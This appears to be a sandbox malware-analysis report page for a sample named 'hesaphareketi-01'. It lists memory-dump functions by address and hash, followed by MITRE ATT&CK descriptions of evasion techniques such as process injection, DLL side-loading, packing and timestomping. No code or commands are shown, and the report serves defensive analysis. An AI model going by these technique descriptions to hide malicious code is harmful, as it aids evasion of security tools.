Opcode ID: 1b2a0d7f5bbc95733126fe2fd23505723e74f2b2fe676822b8148b409aca99ce
Instruction ID: ee05e755104e42c54ee336ddd4fbfe0e5238c8da5336ca28a45ba5565f56c252
Opcode Fuzzy Hash: 1b2a0d7f5bbc95733126fe2fd23505723e74f2b2fe676822b8148b409aca99ce
Instruction Fuzzy Hash: D22192303002144BEF2E6A6E9854B7E6697AFC4758F14803DD502CB79AEFB5CC42D7A1

Function 0567E588 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3899281475.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5670000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e560679f7fb1bce87c5dca45916e8097bad34868d7779839ec33f7b8314ea9b
Instruction ID: e349596d61bd32746cdc759de0acf8f3a644207f30fab5fe6ddf672c6acef706
Opcode Fuzzy Hash: 1e560679f7fb1bce87c5dca45916e8097bad34868d7779839ec33f7b8314ea9b
Instruction Fuzzy Hash: 2121283160011A8BDB39DB78C488D3EBBBAFF4020471449A9D92AC7795DB32EDC9C795

Function 0567EBE3 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3899281475.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5670000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0da6b118d520e537bec5c158183021602b0e658edb21dd2de27759fc9a9e337
Instruction ID: 1a6866e24de8c40cd27983bb128de153deabc40770229c9a03ef04f9b79d10dc
Opcode Fuzzy Hash: b0da6b118d520e537bec5c158183021602b0e658edb21dd2de27759fc9a9e337
Instruction Fuzzy Hash: 89215C75E00119CFCB14EFB9D9449AE7BF9BF88711B1041A9E81AE7354DB358D06CBA0

Function 011D28F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3894518958.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11d0000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcdf2dac8f00205ddbfb0c50c19577e8be3aae839491b028939bbe20d3c6ae52
Instruction ID: 59cf5f80c32bcdde07624418730d4c07b0c1bed07064c9bb660349b7a9f38882
Opcode Fuzzy Hash: fcdf2dac8f00205ddbfb0c50c19577e8be3aae839491b028939bbe20d3c6ae52
Instruction Fuzzy Hash: 5E218135A00118AFCF5DDF78C4409AE7BB5EBA9760B508419E8199B340EB30EA46CBE1

Function 011DAEF0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3894518958.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11d0000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1e6de4c0f6d1cbf20926627f0f272a0ede9383f430692ae7cac37d44441fe46
Instruction ID: fb64bfbe7d4599c7c5301af324ac2415b0c4b93d2570c5ef71d858e46f6f154f
Opcode Fuzzy Hash: a1e6de4c0f6d1cbf20926627f0f272a0ede9383f430692ae7cac37d44441fe46
Instruction Fuzzy Hash: 6B218376B042049FDB18DF58E854ADEBBB5FF88320F14806AE516E7391DB319C45CB91

Function 011D6300 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3894518958.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11d0000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b971351a1fa55b1153ded562bb2ce55c661fb9443714aaf22d08f3567608863
Instruction ID: 5c89439672b40146bbc5c352914ece45a1c0550eba2126cf5bf0f5c2c100a216
Opcode Fuzzy Hash: 9b971351a1fa55b1153ded562bb2ce55c661fb9443714aaf22d08f3567608863
Instruction Fuzzy Hash: 1621C035708611AFD72D9A2AC454A2EB7A2EFC9751705807DE91ADB398CF31DC02CBA0

Function 011DF747 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3894518958.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11d0000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32c7a2c0b22a1984350b7001d91874fdd0b64e813528dd0826878bbc3945d167
Instruction ID: dc8806a566e84679268be985d7ef52b45f7a678de5815e7a05360ab856f5a307
Opcode Fuzzy Hash: 32c7a2c0b22a1984350b7001d91874fdd0b64e813528dd0826878bbc3945d167
Instruction Fuzzy Hash: 2831F370D01319DFDB18DFA9E4587EEBBB2AF89300F508429E416BB290EB755646CF60

Function 00DFD044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3893866025.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_dfd000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0853369151ffb49e4115cbde272843655507cce9d53b1ef26c43883bab0015b6
Instruction ID: 95d4e07826f667453da5c3ce14deb33d95b2901258967c78e58a5ba484dda6bb
Opcode Fuzzy Hash: 0853369151ffb49e4115cbde272843655507cce9d53b1ef26c43883bab0015b6
Instruction Fuzzy Hash: B921F271504348AFDB14DF20D9C4B26BBA7FB84314F24C5ADEA494B282CB36D846CA72

Function 011D6240 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3894518958.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11d0000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04b52c6ddf4159ebc0c7b4aeff290c13f24349ec0abe15570af4c1819091ed89
Instruction ID: 9f53d7bd8d922938f3fbafaebd727e4288c2052bd3866cb9b1084345970e73bc
Opcode Fuzzy Hash: 04b52c6ddf4159ebc0c7b4aeff290c13f24349ec0abe15570af4c1819091ed89
Instruction Fuzzy Hash: 24110430B182508FCB2E867D8C14B7A3BB05F96360F0606BFE456CB2A3DB24C842C756

Function 011D4285 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3894518958.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11d0000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbc2e904d9532dca7f5fe472868fea78f32934a100eeac8f2b5abc77874b79df
Instruction ID: deacc15ba8c23ea8a32eb0acaeb853e74af91275dade209e7ff120c6d014e053
Opcode Fuzzy Hash: bbc2e904d9532dca7f5fe472868fea78f32934a100eeac8f2b5abc77874b79df
Instruction Fuzzy Hash: 74318E78E01208DFCB58EFA8E59489DBBB2FF59314B204569E819AB324D735AD41CF10

Function 011D5649 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3894518958.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11d0000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e25756a0d515f288ef13d959961f72d51a8ae5a1aa7b67445a0869eaf1a34b86
Instruction ID: 396f2fbef6e1e473b28f7397fe9acdcd0c6cdb280f4c35527f9be94892466b0b
Opcode Fuzzy Hash: e25756a0d515f288ef13d959961f72d51a8ae5a1aa7b67445a0869eaf1a34b86
Instruction Fuzzy Hash: EE21F331605248CFCB59AF28E448BBE3BB2EB94310F108069F9059B355CB74CE51CBA0

Function 011D9761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3894518958.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11d0000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4c8ea37b340460255ee10833e0fe2fdbbc3adb51e30b7268c5bdf98a48317ed
Instruction ID: 770fc0f163778f5a2f9eb6582b4b6051a34033f90f562b8d8409429a886baade
Opcode Fuzzy Hash: e4c8ea37b340460255ee10833e0fe2fdbbc3adb51e30b7268c5bdf98a48317ed
Instruction Fuzzy Hash: C2214631E0524CDFDB19CFB5E594AEEBFB6AF48208F248069E415A7294DB30D981DF60

Function 011D62F0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3894518958.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11d0000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b35d35f240dd34fff2f3edec40a67ac497ce23f6ac0439fd76c3852b1bdc38b3
Instruction ID: f1be384feeb649a6ec34e07a25d47005bd804cc35fc4e8e8e302989845a48c0b
Opcode Fuzzy Hash: b35d35f240dd34fff2f3edec40a67ac497ce23f6ac0439fd76c3852b1bdc38b3
Instruction Fuzzy Hash: 2611E331708611AFD72E5A2ED85853E7BA2AFC575130940BDE51ACB3A4CF30CC02C790

Function 011DF658 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3894518958.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11d0000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fc1c2802cd3aa71fc7cc5fd84f4c78642dfa174a89a6bef9fceedb4aa98b223
Instruction ID: 78779fe0905102f746179ff47e673b4cee62c9c5ecc77dfa0c616e674ffb286d
Opcode Fuzzy Hash: 4fc1c2802cd3aa71fc7cc5fd84f4c78642dfa174a89a6bef9fceedb4aa98b223
Instruction Fuzzy Hash: 0B2165B19003099FDB05EFA8D94069EBBF2FF95310F1081AAC158AB325E7344A058F91

Function 011D27F0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3894518958.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11d0000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ece2490bf4b03d6a9abb48b75ec4e37286f8f1039a3f3cf5ef94180905e3add
Instruction ID: 0c3cbdc9013a08138a2432f1279d7b9a3da575e440be036f7ed6628187b77563
Opcode Fuzzy Hash: 7ece2490bf4b03d6a9abb48b75ec4e37286f8f1039a3f3cf5ef94180905e3add
Instruction Fuzzy Hash: 2B21E274D052498FCB09EFA9D8445EEBFF0BF4A304F10416AE815B2224EB315A85CBA1

Function 011DF668 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3894518958.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11d0000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25df2cd08dedcc82cb551161530522e8a24be12e6b2668ef40e8d81a2bd25d5e
Instruction ID: ae401a6278687dc2f097526dc2a3f5bf518ab060d131145df4e25bf7d23c4dde
Opcode Fuzzy Hash: 25df2cd08dedcc82cb551161530522e8a24be12e6b2668ef40e8d81a2bd25d5e
Instruction Fuzzy Hash: DF1159B1D00209DFEB04EFA9D94079EBBF2FB94310F10C5AAC118AB364EB745A058F95

Function 00DFD03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3893866025.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_dfd000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
Instruction ID: 2156b0d1644a076b0ef602d43c4afd9eee0936453aa64ebcf253aaa0d8a7017d
Opcode Fuzzy Hash: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
Instruction Fuzzy Hash: 5411D075504288DFCB11CF10C5C4B25BBA2FB44314F28C6A9D9494B252C33AD84ACF61

Function 011D5E98 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3894518958.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11d0000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ece2b38efd480f1cc06a377c0831af31a88fc2a2d57fac9bbd694d4a743e8c2d
Instruction ID: 7258253f52863da344dbd4e248f6078860c5bbd19236a46e9a4b71e530293c0f
Opcode Fuzzy Hash: ece2b38efd480f1cc06a377c0831af31a88fc2a2d57fac9bbd694d4a743e8c2d
Instruction Fuzzy Hash: 560128327041546FCB19AE58D8106AF7FB7EBC9350B09802AF914DB284DB318D129BA5

Function 011DE8E8 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3894518958.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11d0000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc18a10813bd185341110cd27632cbb6537871050d33bb1f124f9b6120004938
Instruction ID: 4bb3d6f28e04eec93ce9137efe49115e12f5f6cd19e3c056625d21b92983eb8b
Opcode Fuzzy Hash: bc18a10813bd185341110cd27632cbb6537871050d33bb1f124f9b6120004938
Instruction Fuzzy Hash: C6118C79D04309DFCB41DFA8D8449AEBBB1FB59301F004066D910A3354E7346A15DFA0

Function 011DABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3894518958.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11d0000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58381e195f71e965f0f3dd4c4731c09f9fa7f6201d67c8eed87d2c6e81d853cd
Instruction ID: 31d083073bdcceb4874da7473960afebde4ba2414d253dd74f30c9812ac90584
Opcode Fuzzy Hash: 58381e195f71e965f0f3dd4c4731c09f9fa7f6201d67c8eed87d2c6e81d853cd
Instruction Fuzzy Hash: B7F096313006144B972EEA2EE454A2ABADEEFC8A65315447DE909C7365EF21CC438791

Function 011D9D59 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3894518958.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11d0000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 025642b091030b02e7f76d3d85a2080016539bc9b684957b9b40733292656103
Instruction ID: a154b264a4344058670800141b71fef91e160d357b9d0d5f55a9cffc35f42b45
Opcode Fuzzy Hash: 025642b091030b02e7f76d3d85a2080016539bc9b684957b9b40733292656103
Instruction Fuzzy Hash: A3F044353002296FDB1D1AA9A850ABFBB9BEBCC364B144429FA4AC7351DE71CC4187A0

Function 0567EB58 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3899281475.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5670000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1e9fcd779a0bc3ae5fa1403889ddb33c63cd8f39e07352797edcbcfc4f71ecf
Instruction ID: 9e5c394b60b63288b0ecfffb337369b876ba2c24b38a85f74e23e57ced69da4f
Opcode Fuzzy Hash: a1e9fcd779a0bc3ae5fa1403889ddb33c63cd8f39e07352797edcbcfc4f71ecf
Instruction Fuzzy Hash: 0201E470E002198BCB44EFB9C9406EEBBF5AF88200F1085AAD51AE7250E7395906CBA0

Function 011D9C23 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3894518958.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11d0000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 249d55c86042452e750bbee8f3528951c65843d6931c0cd53125713e54577b49
Instruction ID: cb85dc40d8f29c399f20dbe79639c8b29cf55891430036f5b8c0477645a46971
Opcode Fuzzy Hash: 249d55c86042452e750bbee8f3528951c65843d6931c0cd53125713e54577b49
Instruction Fuzzy Hash: AFF0B4329042589FCB159F689804AEEBFF5EFC9320F05C077E518C7261D3314955DB91

Function 0567E690 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3899281475.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5670000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2041a95ade1f7f1f41ed3a01d2f698e73b22a0efc55f12cc514986728ec6fff2
Instruction ID: 1c7267a4fc5d0c087e6484627c5ecadbf7d76a64f05f8ce5462581a0aa15444c
Opcode Fuzzy Hash: 2041a95ade1f7f1f41ed3a01d2f698e73b22a0efc55f12cc514986728ec6fff2
Instruction Fuzzy Hash: EAF030353086448FD718EB29D858D267BAEBF8661471544EAF50ACB3A2DA21DC45C790

Function 0567E6A0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3899281475.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5670000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb04553cbfad722106d4324c5d006ab55d2405f20aacd628ea7577825ddca96a
Instruction ID: 835eb6be87969ee75d424045ecd4b2639baa925d19a388f5a35989fa1315e265
Opcode Fuzzy Hash: bb04553cbfad722106d4324c5d006ab55d2405f20aacd628ea7577825ddca96a
Instruction Fuzzy Hash: 79F08C353001048FD718AA3AE858A2A37AAFFC871470584B9F50ACB3A4DE21DC01C790

Function 011DF5D8 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3894518958.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11d0000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed82636fb149dfe6b8145647c7650eccd0100e97d76ded89a7b768eb22d64a09
Instruction ID: 845089419612735869b97cb61d096b95a2b976abd916c0b58fb5fa2bc83b0b30
Opcode Fuzzy Hash: ed82636fb149dfe6b8145647c7650eccd0100e97d76ded89a7b768eb22d64a09
Instruction Fuzzy Hash: 02F03A75A10216CFCB88EF7CD44499E7BF0AF09210B1144A9D40ADB321EB30DA028B91

Function 011D6739 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3894518958.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11d0000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e060dc518c94819b909e35368fc3799b491f1a54d5d03400bec493ecfe9cddc5
Instruction ID: 79aaf15279551e299d3989954950afa4a0d48694a7421674cad7fe4e733c7204
Opcode Fuzzy Hash: e060dc518c94819b909e35368fc3799b491f1a54d5d03400bec493ecfe9cddc5
Instruction Fuzzy Hash: 01E0C2324083844FCB27EB30E8550DA3B66AAA1220B0491AAD0054E65ACEB98A468F31

Function 011D28B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3894518958.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11d0000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 558d78309c471a61736242bdbc055a9d7bc7e15f3d69a48c6bb156fd2423c655
Instruction ID: c8304c53151226d54f0c9d3a3f5e6c8c03e030300ef8879c3aee508963828839
Opcode Fuzzy Hash: 558d78309c471a61736242bdbc055a9d7bc7e15f3d69a48c6bb156fd2423c655
Instruction Fuzzy Hash: 3BD05B31D2022A57CB00E7A5DC044DFFB38EFD6721B514666D55437140FB702659C6F1

Function 011D28AB Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3894518958.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11d0000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 388e03fbf6f45da9675864ff0927a0959f52241cf13b91b56f23764fed2e8d8e
Instruction ID: 83a8e198e8a8d001df8d0a66848615c3348adfebe8a666b579a6abc571a44973
Opcode Fuzzy Hash: 388e03fbf6f45da9675864ff0927a0959f52241cf13b91b56f23764fed2e8d8e
Instruction Fuzzy Hash: 10D0C231D2022A86CB00EBB49C010DEB734EE81321B548626C52433140EB30166886E1

Function 011D8EF8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3894518958.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11d0000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: e61e0b73fb516db6765282b23dbfb897528f226565fd027c7f6e028fa0c9a6e6
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: CDC08C3320C1282AA23D104EBC40EA3BB8DC3C23B4A2202B7FB1CD3200EC429C8001FA

Function 011DD6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3894518958.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11d0000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c86bff0c5d1ec32bc7d0b3717583dcaebbc1089e4f55ec83b5326b12ee899d3
Instruction ID: 43ecb025b7957ac13551c0ff8bd56df9feff1ab846fcc1fe822111c0373e3084
Opcode Fuzzy Hash: 1c86bff0c5d1ec32bc7d0b3717583dcaebbc1089e4f55ec83b5326b12ee899d3
Instruction Fuzzy Hash: E6D04275E0450DCBCF34DFA8F4884DCBBB1EF49321B20546AD929A3251D63454558F55

Function 011DAFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3894518958.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11d0000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4013d1c45c3fc278a45fdf1219d62166b8f77c79afb50cf68a6e8d7fe07cf99
Instruction ID: cc66b7c6ed23eb83ac36194434e40773e9d8bf33b4c36153f4d383b03cc2bc78
Opcode Fuzzy Hash: c4013d1c45c3fc278a45fdf1219d62166b8f77c79afb50cf68a6e8d7fe07cf99
Instruction Fuzzy Hash: 2ED0673BB000089FCB149F98E8409DDF776FB98221B448126E925A3264C6319965DB55

Function 011D6748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3894518958.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11d0000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d8e41f6fe61fca1abc954ce6f81b7e20110b4ee903fa5a904d0f5dd07fff2cb
Instruction ID: 79470e8f63e6b3317373cc5b48fa7f49c9a8b225efdd2b49cfd9625f2c47f5ca
Opcode Fuzzy Hash: 7d8e41f6fe61fca1abc954ce6f81b7e20110b4ee903fa5a904d0f5dd07fff2cb
Instruction Fuzzy Hash: 7FC0803100434C4FD515F771FC45555335EA6D06257448524A0050A74DDFF5D9454FA9

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
